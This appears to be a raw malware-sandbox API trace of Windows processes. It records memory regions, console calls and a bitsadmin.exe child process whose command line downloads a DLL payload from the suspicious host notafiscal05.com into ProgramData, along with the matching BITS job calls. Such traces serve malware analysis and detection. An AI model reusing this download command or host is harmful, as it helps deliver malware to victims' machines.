[0076.073] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16dc6c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc6c*=0x5) returned 1
[0076.073] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc5c | out: lpConsoleScreenBufferInfo=0x16dc5c) returned 1
[0076.074] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16dc74, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc74*=0x8) returned 1
[0076.074] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.074] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dc80 | out: _Buffer="15") returned 2
[0076.074] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dc84 | out: _Buffer="15") returned 2
[0076.074] _vsnwprintf (in: _Buffer=0xac03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16dc80 | out: _Buffer="100") returned 3
[0076.074] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc7c | out: lpConsoleScreenBufferInfo=0x16dc7c) returned 1
[0076.075] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x16dc94, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc94*=0xe) returned 1
[0076.075] CoTaskMemFree (pv=0x228338)
[0076.075] IBackgroundCopyJob:Complete (This=0x21a5b4) returned 0x0
[0076.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc80 | out: lpConsoleScreenBufferInfo=0x16dc80) returned 1
[0076.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc54 | out: lpConsoleScreenBufferInfo=0x16dc54) returned 1
[0076.245] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16dc6c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc6c*=0x2) returned 1
[0076.246] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16dc54 | out: lpConsoleScreenBufferInfo=0x16dc54) returned 1
[0076.246] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x16dc6c, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16dc6c*=0x14) returned 1
[0076.247] GetCurrentThreadId () returned 0xda8
[0076.247] PostThreadMessageW (idThread=0xda8, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0076.256] PeekMessageW (in: lpMsg=0x16f680, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f680) returned 1
[0076.256] IUnknown:Release (This=0x21a5b4) returned 0x1
[0076.256] IUnknown:Release (This=0x21a4dc) returned 0x0
[0076.259] CoUninitialize ()
[0076.260] IUnknown:Release (This=0x230c28) returned 0x2
[0076.260] IUnknown:Release (This=0x230c28) returned 0x1
[0076.260] IUnknown:Release (This=0x230c28) returned 0x0
[0076.260] IUnknown:Release (This=0x21a5b4) returned 0x1
[0076.260] CoTaskMemFree (pv=0x230c28)
[0076.268] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0076.268] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0076.268] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.268] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0076.269] CloseHandle (hObject=0x80) returned 1
[0076.269] exit (_Code=0)
Thread:
id = 181
os_tid = 0xdbc
Thread:
id = 182
os_tid = 0xdc0
Thread:
id = 183
os_tid = 0xdc4
Thread:
id = 184
os_tid = 0xdc8
Process:
id = "19"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be3a0"
os_pid = "0xdd4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159 C:\\ProgramData\\tempa\\marxvxinhhm98.dll"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1905
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1906
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1907
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1908
start_va = 0x50000
end_va = 0x8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1909
start_va = 0x760000
end_va = 0x7a3fff
entry_point = 0x760000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1910
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1911
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1912
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1913
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 1914
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1915
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1916
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1917
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1918
start_va = 0x100000
end_va = 0x10ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1919
start_va = 0x110000
end_va = 0x1d7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1920
start_va = 0x210000
end_va = 0x30ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1921
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1922
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1923
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1924
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1925
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1926
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1927
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1928
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1929
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1930
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1931
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1932
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1933
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1934
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1935
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1936
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1937
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1938
start_va = 0x1e0000
end_va = 0x1e6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1939
start_va = 0x1f0000
end_va = 0x1f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1940
start_va = 0x200000
end_va = 0x200fff
entry_point = 0x200000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1941
start_va = 0x310000
end_va = 0x410fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 1942
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 1943
start_va = 0x430000
end_va = 0x430fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 1944
start_va = 0x7b0000
end_va = 0x13affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 1945
start_va = 0x440000
end_va = 0x49bfff
entry_point = 0x440000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1946
start_va = 0x440000
end_va = 0x49bfff
entry_point = 0x440000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1947
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1948
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1949
start_va = 0x440000
end_va = 0x64ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1950
start_va = 0x440000
end_va = 0x51efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 1951
start_va = 0x610000
end_va = 0x64ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 1952
start_va = 0x520000
end_va = 0x520fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 1953
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1954
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1955
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 1956
start_va = 0x670000
end_va = 0x6affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 1957
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1958
start_va = 0x1470000
end_va = 0x14affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001470000"
filename = ""
Region:
id = 1959
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1960
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1961
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1962
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1963
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1964
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1965
start_va = 0x540000
end_va = 0x57bfff
entry_point = 0x540000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1966
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1967
start_va = 0x14b0000
end_va = 0x177efff
entry_point = 0x14b0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1968
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1969
start_va = 0x710000
end_va = 0x74ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 1970
start_va = 0x13b0000
end_va = 0x13effff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 1971
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1972
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1973
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 186
os_tid = 0xdd8
[0076.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8f7a4 | out: lpSystemTimeAsFileTime=0x8f7a4*(dwLowDateTime=0xde22ad90, dwHighDateTime=0x1d469c7))
[0076.382] GetCurrentProcessId () returned 0xdd4
[0076.382] GetCurrentThreadId () returned 0xdd8
[0076.382] GetTickCount () returned 0x20fc8
[0076.382] QueryPerformanceCounter (in: lpPerformanceCount=0x8f79c | out: lpPerformanceCount=0x8f79c*=1815032800000) returned 1
[0076.383] GetModuleHandleA (lpModuleName=0x0) returned 0x760000
[0076.383] __set_app_type (_Type=0x1)
[0076.383] __p__fmode () returned 0x757a31f4
[0076.383] __p__commode () returned 0x757a31fc
[0076.383] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x787f33) returned 0x0
[0076.383] __wgetmainargs (in: _Argc=0x7a0824, _Argv=0x7a082c, _Env=0x7a0828, _DoWildCard=0, _StartInfo=0x7a0838 | out: _Argc=0x7a0824, _Argv=0x7a082c, _Env=0x7a0828) returned 0
[0076.384] _onexit (_Func=0x78925e) returned 0x78925e
[0076.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0076.384] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0076.385] AitLogFeatureUsageByApp () returned 0x0
[0076.385] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0076.385] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0076.385] VerifyVersionInfoW (in: lpVersionInformation=0x8f618, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x8f618) returned 1
[0076.385] SetLastError (dwErrCode=0x0)
[0076.385] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0076.385] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0076.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0076.386] GetCurrentProcess () returned 0xffffffff
[0076.386] GetCurrentThread () returned 0xfffffffe
[0076.386] GetCurrentProcess () returned 0xffffffff
[0076.386] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x78c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x78c3b0*=0x80) returned 1
[0076.386] SetConsoleCtrlHandler (HandlerRoutine=0x7774cb, Add=1) returned 1
[0076.386] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0076.386] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0076.386] SetThreadUILanguage (LangId=0x0) returned 0x409
[0076.386] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0076.387] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0076.387] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0076.388] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0076.388] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0076.388] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0076.388] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0076.389] swprintf_s (in: _Dst=0x8f710, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0076.389] GetFileType (hFile=0x7) returned 0x2
[0076.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x8f684 | out: lpMode=0x8f684) returned 1
[0076.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8f6b4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6b4*=0x2) returned 1
[0076.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x8f6c0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6c0*=0x24) returned 1
[0076.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x8f6c4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6c4*=0x1e) returned 1
[0076.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x8f6c8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6c8*=0x29) returned 1
[0076.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8f6cc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6cc*=0x2) returned 1
[0076.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x8f6d0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6d0*=0x5e) returned 1
[0076.391] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x8f6d4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6d4*=0x58) returned 1
[0076.391] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8f6d8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8f6d8*=0x2) returned 1
[0076.391] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0076.405] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0076.405] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x8f724 | out: lpNumberOfEvents=0x8f724) returned 1
[0076.405] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0076.405] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x78c3a8 | out: lpMode=0x78c3a8) returned 1
[0076.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x78c390 | out: lpConsoleScreenBufferInfo=0x78c390) returned 1
[0076.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x78c38c | out: lpMode=0x78c38c) returned 1
[0076.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0076.406] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0076.406] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0076.406] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0076.406] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0076.406] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0076.406] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0076.406] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0076.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0076.407] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0076.407] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0076.407] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0076.407] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0076.407] CoCreateInstance (in: rclsid=0x7765d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x7765b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x78c3b4 | out: ppv=0x78c3b4*=0x22a54c) returned 0x0
[0076.465] IBackgroundCopyManager:CreateJob (in: This=0x22a54c, DisplayName="msd5", Type=0x0, pJobId=0x8f6ec, ppJob=0x8f6e8 | out: pJobId=0x8f6ec*(Data1=0xeecf7a7f, Data2=0xc813, Data3=0x4d67, Data4=([0]=0xa2, [1]=0x5, [2]=0x19, [3]=0x6e, [4]=0xd7, [5]=0x72, [6]=0xbb, [7]=0xed)), ppJob=0x8f6e8*=0x22a624) returned 0x0
[0076.473] CoTaskMemAlloc (cb=0x50) returned 0x240cb0
[0076.473] IUnknown:AddRef (This=0x22a624) returned 0x2
[0076.473] IUnknown:AddRef (This=0x22a624) returned 0x3
[0076.473] PeekMessageW (in: lpMsg=0x8f664, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x8f664) returned 0
[0076.473] IUnknown:Release (This=0x22a624) returned 0x2
[0076.473] IBackgroundCopyJob:SetPriority (This=0x22a624, Val=0x0) returned 0x0
[0076.477] IBackgroundCopyJob:AddFile (This=0x22a624, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhm98.dll.zip?714489159", LocalName="C:\\ProgramData\\tempa\\marxvxinhhm98.dll") returned 0x0
[0076.487] IBackgroundCopyJob:SetNotifyFlags (This=0x22a624, Val=0xb) returned 0x0
[0076.494] IBackgroundCopyJob:SetNotifyInterface (This=0x22a624, Val=0x240cb0) returned 0x0
[0076.494] IUnknown:QueryInterface (in: This=0x240cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f168 | out: ppvObject=0x8f168*=0x0) returned 0x80004002
